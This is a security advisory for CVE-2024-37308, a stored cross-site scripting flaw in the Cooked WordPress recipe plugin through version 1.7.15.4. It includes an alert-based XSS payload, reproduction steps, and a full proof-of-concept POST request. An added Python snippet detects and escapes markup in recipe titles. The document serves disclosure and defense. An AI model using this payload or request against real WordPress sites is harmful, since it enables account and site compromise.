WordPress Cooked Plugin <= 1.7.15.4 - Authenticated (Contributor+) Persistent Cross-Site Scripting Vulnerability

Moderate
XjSv published GHSA-9vfv-c966-jwrv Jun 13, 2024

Package

No package listed

Affected versions

<= 1.7.15.4

Patched versions

1.8.0

Description

The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the ‘post_title’ parameter in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page.

Payload:

RE:<img src=x onerror=alert(origin);//

Steps to reproduce:

[0] Install & activate the plugin.
[1] Add a recipe at ‘/wp-admin/post-new.php?post_type=cp_recipe’.
[2] Use your payload in the RECIPE TITLE input field and fill in the VIDEO URL (Gallery tab > ‘_recipe_settings[gallery][video_url]’) input field as well.
[3] Publish the recipe.
[4] Injected payload will trigger on the newly created recipe page.

Impact:

Malicious file upload, creation of an account with administrator-level access, and the ability to completely compromise the targeted website.

PoC request:

POST /wp-admin/post.php HTTP/2
Host: target.tld
Cookie: [contributor_cookies]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

_wpnonce=c3h1a3o3s7&user_ID=4&action=editpost&originalaction=editpost&post_author=4&post_type=cp_recipe&original_post_status=publish&post_ID=256&meta-box-order-nonce=c3h1a3o3s7&closedpostboxesnonce=c3h1a3o3s7&post_title=RE%3A%3Cimg+src%3Dx+onerror%3Dalert%28origin%29%3B%2F%2F&samplepermalinknonce=c3h1a3o3s7&content=%3Ch2%3ERE%3Aalert%28origin%29%3B%3C%2Fh2%3E%0D%0A%3Ch3%3EIngredients%3C%2Fh3%3E%0D%0A%3Cdiv+class%3D%22cooked-recipe-ingredients%22%3E%3C%2Fdiv%3E%0D%0A%3Ch3%3EDirections%3C%2Fh3%3E%0D%0A%3Cdiv+class%3D%22cooked-recipe-directions%22%3E%3C%2Fdiv%3E&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=06&jj=10&aa=2024&hh=04&mn=21&ss=05&hidden_mm=06&cur_mm=06&hidden_jj=10&cur_jj=10&hidden_aa=2024&cur_aa=2024&hidden_hh=04&cur_hh=04&hidden_mn=21&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bcp_recipe_category%5D%5B%5D=0&tax_input%5Bcp_recipe_category%5D%5B%5D=24&tax_input%5Bcp_recipe_category%5D%5B%5D=25&tax_input%5Bcp_recipe_category%5D%5B%5D=23&newcp_recipe_category=New+Category+Name&newcp_recipe_category_parent=-1&_ajax_nonce-add-cp_recipe_category=c3h1a3o3s7&_thumbnail_id=-1&_recipe_settings%5Bcooked_version%5D=1.7.15.4&_recipe_settings%5Bcontent%5D=%3Cp%3E%5Bcooked-info+left%3D%22author%2Ctaxonomies%2Cdifficulty%22+right%3D%22print%2Cfullscreen%22%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-excerpt%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-image%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-info+left%3D%22servings%22+right%3D%22prep_time%2Ccook_time%2Ctotal_time%22%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-ingredients%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-directions%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-gallery%5D%3C%2Fp%3E&_recipe_settings%5Bexcerpt%5D=&_recipe_settings%5Bseo_description%5D=&_recipe_settings%5Bdifficulty_level%5D=0&_recipe_settings%5Bprep_time%5D=&_recipe_settings%5Bcook_time%5D=&_recipe_settings%5Btotal_time%5D=&_recipe_settings%5Bingredients%5D%5B9929571%5D%5Bamount%5D=
&_recipe_settings%5Bingredients%5D%5B9929571%5D%5Bmeasurement%5D=&_recipe_settings%5Bingredients%5D%5B9929571%5D%5Bname%5D=&_recipe_settings%5Bdirections%5D%5B7912515%5D%5Bimage%5D=&_recipe_settings%5Bdirections%5D%5B7912515%5D%5Bcontent%5D=&_recipe_settings%5Bnutrition%5D%5Bserving_size%5D=&_recipe_settings%5Bnutrition%5D%5Bservings%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bfat%5D=&_recipe_settings%5Bnutrition%5D%5Bsat_fat%5D=&_recipe_settings%5Bnutrition%5D%5Btrans_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bcholesterol%5D=&_recipe_settings%5Bnutrition%5D%5Bsodium%5D=&_recipe_settings%5Bnutrition%5D%5Bpotassium%5D=&_recipe_settings%5Bnutrition%5D%5Bcarbs%5D=&_recipe_settings%5Bnutrition%5D%5Bfiber%5D=&_recipe_settings%5Bnutrition%5D%5Bsugars%5D=&_recipe_settings%5Bnutrition%5D%5Bprotein%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_a%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_c%5D=&_recipe_settings%5Bnutrition%5D%5Bcalcium%5D=&_recipe_settings%5Bnutrition%5D%5Biron%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_d%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_e%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_k%5D=&_recipe_settings%5Bnutrition%5D%5Bthiamin%5D=&_recipe_settings%5Bnutrition%5D%5Briboflavin%5D=&_recipe_settings%5Bnutrition%5D%5Bniacin%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b6%5D=&_recipe_settings%5Bnutrition%5D%5Bfolate%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b12%5D=&_recipe_settings%5Bnutrition%5D%5Bbiotin%5D=&_recipe_settings%5Bnutrition%5D%5Bpantothenic_acid%5D=&_recipe_settings%5Bnutrition%5D%5Bphosphorus%5D=&_recipe_settings%5Bnutrition%5D%5Biodine%5D=&_recipe_settings%5Bnutrition%5D%5Bmagnesium%5D=&_recipe_settings%5Bnutrition%5D%5Bzinc%5D=&_recipe_settings%5Bnutrition%5D%5Bselenium%5D=&_recipe_settings%5Bnutrition%5D%5Bcopper%5D=&_recipe_settings%5Bnutrition%5D%5Bmanganese%5D=&_recipe_settings%5Bnutrition%5D%5Bchromium%5D=&_recipe_settings%5B
nutrition%5D%5Bmolybdenum%5D=&_recipe_settings%5Bnutrition%5D%5Bchloride%5D=&_recipe_settings%5Bgallery%5D%5Btype%5D=cooked&_recipe_settings%5Bgallery%5D%5Bvideo_url%5D=%23&cooked_recipe_custom_box_nonce=c3h1a3o3s7&advanced_view=1&comment_status=open&add_comment_nonce=c3h1a3o3s7&_ajax_fetch_list_nonce=c3h1a3o3s7&post_name=poc&post_author_override=4

Additional details:

Injected payload will trigger if the ‘_recipe_settings[gallery][video_url]’ parameter is specified.
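
Detection logic for the request described above, as an added example that is not part of the original advisory or the plugin's code: it parses a urlencoded post.php body and flags cp_recipe saves whose post_title carries HTML markup, and reports whether the video_url condition from the additional details is met. The function name, the regex and the shortened sample bodies are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# An opening, closing or declaration tag; none belongs in a recipe title.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")

TITLE_FIELD = "post_title"
VIDEO_FIELD = "_recipe_settings[gallery][video_url]"


def inspect_recipe_save(body: str) -> dict:
    """Inspect a urlencoded /wp-admin/post.php body for markup in a cp_recipe title."""
    form = parse_qs(body, keep_blank_values=True)

    def first(key: str) -> str:
        return form.get(key, [""])[0]

    title = first(TITLE_FIELD)
    is_recipe = first("post_type") == "cp_recipe"
    has_markup = bool(MARKUP_RE.search(title))
    video_set = first(VIDEO_FIELD) != ""
    return {
        "is_recipe": is_recipe,
        "title": title,
        "title_has_markup": is_recipe and has_markup,
        # The advisory notes the payload fires when video_url is specified.
        "trigger_condition_met": is_recipe and has_markup and video_set,
        # The same title after HTML output escaping: inert text, not markup.
        "escaped_title": html.escape(title, quote=True),
    }


# Constructed sample bodies: only the fields relevant to the advisory.
SAMPLE_FLAGGED = (
    "action=editpost&post_type=cp_recipe&post_ID=256"
    "&post_title=RE%3A%3Cimg+src%3Dx+onerror%3Dalert%28origin%29%3B%2F%2F"
    "&_recipe_settings%5Bgallery%5D%5Bvideo_url%5D=%23"
)
SAMPLE_BENIGN = (
    "action=editpost&post_type=cp_recipe&post_ID=257"
    "&post_title=Grandma%27s+Apple+Pie"
    "&_recipe_settings%5Bgallery%5D%5Bvideo_url%5D="
)

if __name__ == "__main__":
    for sample in (SAMPLE_FLAGGED, SAMPLE_BENIGN):
        print(inspect_recipe_save(sample))
```

The same check can be run over titles already stored for cp_recipe posts to find entries saved before upgrading to 1.8.0.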

Severity

Moderate 5.4 / 10

CVSS base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: Low
User interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CVE ID

CVE-2024-37308
